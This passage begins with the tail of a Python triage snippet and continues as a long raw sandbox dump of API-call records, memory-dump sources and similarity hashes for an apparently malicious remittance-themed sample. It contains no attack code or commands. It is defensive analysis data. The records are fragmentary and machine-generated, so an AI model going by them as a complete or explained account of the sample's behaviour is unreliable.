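    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.name}.{c.module} {decode_mapvirtualkey(c) or ''}")
    print("modifier keys mapped:", sorted(modifier_keys_mapped(parsed)))
```

Run against the full "APIs" text of a report, modifier_keys_mapped returning all of Shift, Ctrl, Alt and Win for one function is a cheap triage hint; the decoded names also make the argument columns readable when comparing records across samples.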
                                                                      APIs
                                                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                      • ExitThread.KERNEL32 ref: 004151ED
                                                                      • __freefls@4.LIBCMT ref: 00415209
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                      • String ID:
                                                                      • API String ID: 442100245-0
                                                                      • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                      • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                      • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                      • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                      APIs
                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                      • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                      • _wcslen.LIBCMT ref: 0045F94A
                                                                      • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                      • String ID: 0
                                                                      • API String ID: 621800784-4108050209
                                                                      • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                      • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                      • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                      • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • SetErrorMode.KERNEL32 ref: 004781CE
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                      • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                      • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                      • String ID: \VH
                                                                      • API String ID: 3884216118-234962358
                                                                      • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                      • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                      • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                      • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                      • IsMenu.USER32(?), ref: 0044854D
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                      • DrawMenuBar.USER32 ref: 004485AF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                      • String ID: 0
                                                                      • API String ID: 3076010158-4108050209
                                                                      • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                      • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                      • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                      • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                      • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_memmove_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 1589278365-1403004172
                                                                      • Opcode ID: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                                      • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                      • Opcode Fuzzy Hash: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                                      • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Handle
                                                                      • String ID: nul
                                                                      • API String ID: 2519475695-2873401336
                                                                      • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                      • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                      • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                      • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Handle
                                                                      • String ID: nul
                                                                      • API String ID: 2519475695-2873401336
                                                                      • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                      • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                      • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                      • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • String ID: SysAnimate32
                                                                      APIs
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                        • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                        • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                        • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                      • GetFocus.USER32 ref: 0046157B
                                                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                      • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                      • __swprintf.LIBCMT ref: 00461608
                                                                      Similarity
                                                                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                      • String ID: %s%d
                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                      Similarity
                                                                      • API ID: ConnectRegistry_memmove_wcslen
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                      Similarity
                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 004563A6
                                                                      • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                      • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                      • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                      APIs
                                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                      • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                      Similarity
                                                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                      Similarity
                                                                      • API ID: Enum$CloseDeleteOpen
                                                                      • String ID:
                                                                      • API String ID: 2095303065-0
APIs
• GetWindowRect.USER32(?,?), ref: 00436A24
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: RectWindow
• String ID:
• API String ID: 861336768-0
APIs
• SendMessageW.USER32 ref: 00449598
  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
• SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
• _wcslen.LIBCMT ref: 0044960D
• _wcslen.LIBCMT ref: 0044961A
• SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: MessageSend$_wcslen$_wcspbrk
• String ID:
• API String ID: 1856069659-0
APIs
• GetCursorPos.USER32(?), ref: 004478E2
• TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
• DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
• GetCursorPos.USER32(00000000), ref: 0044796A
• TrackPopupMenuEx.USER32(009B6430,00000000,00000000,?,?,00000000), ref: 00447991
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: CursorMenuPopupTrack$Proc
• String ID:
• API String ID: 1300944170-0
APIs
• GetClientRect.USER32(?,?), ref: 004479CC
• GetCursorPos.USER32(?), ref: 004479D7
• ScreenToClient.USER32(?,?), ref: 004479F3
• WindowFromPoint.USER32(?,?), ref: 00447A34
• DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: Client$CursorFromPointProcRectScreenWindow
• String ID:
• API String ID: 1822080540-0
APIs
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: ClientPaintRectRectangleScreenViewportWindow
• String ID:
• API String ID: 659298297-0
APIs
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
  • Part of subcall function 00440D98: SendMessageW.USER32(009B1B98,000000F1,00000000,00000000), ref: 00440E6E
  • Part of subcall function 00440D98: SendMessageW.USER32(009B1B98,000000F1,00000001,00000000), ref: 00440E9A
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID: Window$EnableMessageSend$LongShow
• String ID:
• API String ID: 142311417-0
Memory Dump Source
• Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• IsWindowVisible.USER32(?), ref: 00445879
